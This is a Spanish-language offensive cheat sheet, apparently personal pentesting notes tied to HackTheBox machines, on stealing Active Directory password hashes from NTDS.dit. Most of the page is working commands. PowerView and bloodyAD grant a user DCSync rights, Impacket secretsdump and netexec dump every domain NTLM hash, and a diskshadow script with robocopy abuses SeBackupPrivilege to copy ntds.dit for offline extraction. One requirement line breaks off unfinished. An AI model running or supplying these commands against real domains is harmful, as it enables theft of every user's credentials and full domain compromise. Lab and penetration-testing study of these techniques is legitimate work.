NTDS.dit

Introduction

El archivo NTDS.dit es la base de datos del Active Directory en controladores de dominio de Windows. Contiene información crítica como las cuentas de usuario, grupos, políticas y, lo más importante, los hashes de contraseñas de todos los usuarios del dominio.

Un atacante puede extraer este archivo (junto con el SYSTEM hive) para obtener los hashes y crackearlos, ganando acceso a credenciales sensibles.

---

DCSync Rights

Usuario forma parte de un grupo que dispone de privilegios "WriteDacl" sobre el dominio, podemos otorgarle permisos DCSync al usuario . Esto debemos de tener acceso a un equipo del dominio y debemos de importar PowerView.

$SecPass = ConvertTo-SecureString 'Password01!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('htb.local\jr', $SecPass)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jr -Rights DCSync

Con bloodyAD podemos añadir permisos de DCSync (desde Kali)

bloodyAD --host forest.htb.local --dc-ip 10.10.10.10 -d "htb.local" -u 'jr' -p 'Password01!' add dcsync "jr"

Si disponemos de permisos de DCSync, des de Kali dumpearemos el NTDS.dit de la siguiente manera:

# A través de Impacket
secretsdump.py htb.local/jr@10.10.10.10 -just-dc-ntlm -dc-ip 10.10.10.10

# A través de Netexec
netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds

---

SeBackupPrivilege

Requisitos:

• Acceso remoto al Domain Controller del dominio.

• Disponer de usuario con permisos de "SeBackupPrivilege"

• Disponer del archivo 'SYSTEM' del DC. Se puede obtener a través de

Proceso:

Utilizaremos DiskShadow y Robocopy para copiar el archivo "NTDS.dit" y disponer de una copia que la pasaremos a nuestra Kali.

(Importante: Dejar un espacio al final de cada instrucción)

diskshadow.txt

set context persistent nowriters
add volume c: alias gzzcoo
create
expose %gzzcoo% g: 

Ejecutaremos el diskshadow para crear una copia de la unidad C: en la unidad G del DiskShadow.

diskshadow.exe /s C:\Windows\Temp\test\diskshadow.txt

A través de RoboCopy copiaremos el archivo NTDS.dit de la copia de la C que se encuentra en la unidad G.

robocopy /b g:\Windows\NTDS\ . ntds.dit

Pasaremos la copia de los archivos SYSTEM y NTDS.dit a la Kali y haremos el dump con secretsdump.py:

secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

---

References

• DCSync Attack (Hacktricks) --> https://book.hacktricks.wiki/es/windows-hardening/active-directory-methodology/dcsync.html
• Dumping Active Directory Hashes -->https://docs.iwolfsec.com/tecnicas-y-ataques/ataques-a-directorio-activo/credenciales/dumping-active-directory-hashes-ntds.dit
• Diskshadow --< https://pentestlab.blog/tag/diskshadow/
• Máquina HTB 'Forest' de referencia (DCSync) --> https://kogre.gitbook.io/gzzcoo/machines/readme/windows/forest
• Máquina HTB 'Blackfield' de referencia (NTDS.dit) --> https://kogre.gitbook.io/gzzcoo/machines/readme/windows/blackfield